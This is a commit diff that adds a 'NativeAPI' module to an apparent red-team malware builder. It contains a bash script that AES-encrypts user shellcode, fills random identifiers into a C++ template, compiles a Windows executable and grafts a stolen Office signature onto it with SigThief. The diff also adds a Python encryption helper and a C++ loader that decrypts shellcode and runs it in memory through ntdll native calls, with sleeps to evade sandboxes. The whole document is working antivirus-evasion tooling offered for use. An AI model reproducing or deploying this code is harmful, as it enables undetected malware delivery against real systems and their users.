Add files via upload

New Module with NativeAPIs

Harriet/Harriet/NativeAPI/NativeAPI.sh

@@ -0,0 +1,117 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+
+  ___   _____ _____   _____                            _           _  
+ / _ \ |  ___/  ___| |  ___|                          | |         | | 
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| | 
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` | 
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| | 
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_| 
+                                            __/ | |                   
+                                           |___/|_|                   
+ _   _       _   _              ___  ______ _____                     
+| \ | |     | | (_)            / _ \ | ___ \_   _|                    
+|  \| | __ _| |_ ___   _____  / /_\ \| |_/ / | | ___                  
+| . ` |/ _` | __| \ \ / / _ \ |  _  ||  __/  | |/ __|                 
+| |\  | (_| | |_| |\ V /  __/ | | | || |    _| |\__ \                 
+\_| \_/\__,_|\__|_| \_/ \___| \_| |_/\_|    \___/___/                 
+                                                                      
+                                                                     
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp Harriet/NativeAPI/template.cpp Harriet/NativeAPI/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 Harriet/NativeAPI/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Harriet/NativeAPI/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/NativeAPI/Resources/template.cpp
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-19} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+sed -i "s/Random4/$Random4/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-14} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" Harriet/NativeAPI/Resources/template.cpp
+
+#VIRTUALALLOC VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" Harriet/NativeAPI/Resources/template.cpp
+
+
+
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE Harriet/NativeAPI/Resources/template.cpp -fpermissive -Wno-narrowing -O2 -O3 -Os>/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""

Harriet/Harriet/NativeAPI/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Harriet/Harriet/NativeAPI/template.cpp

@@ -0,0 +1,136 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+#include <string.h>
+#include <tlhelp32.h>
+
+// Define the NtAllocateVirtualMemory function pointer
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+    );
+
+// Define the NtFreeVirtualMemory function pointer
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+    );
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+int Random1(char * difern, unsigned int difern_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, difern, &difern_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+	char Random2[] = KEYVALUE
+	unsigned char Random3[] = PAYVAL
+	unsigned int Random7_len = sizeof(Random3);
+
+
+int main() {
+PNTPROTECTVIRTUALMEMORY NtProtectVirtualMemory =
+        (PNTPROTECTVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");
+
+    // Load the NtAllocateVirtualMemory function from ntdll.dll
+    PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+        (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+    FreeConsole();
+    // Allocate Virtual Memory  
+    void* exec = NULL;
+    SIZE_T size = sizeof(Random3);
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+
+    Random1((char *) Random3, Random7_len, Random2, sizeof(Random2));
+    
+    Random4(1500);
+    // Copy shellcode into allocated memory 
+    RtlCopyMemory(exec, Random3, sizeof(Random3));
+    Random4(1560);
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+    if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+        // Handle error if needed
+        return -1;
+    }
+
+    ((void(*)())exec)();
+
+    // Execute shellcode in memory  
+    ((void(*)())exec)();
+    Random4(2540);
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}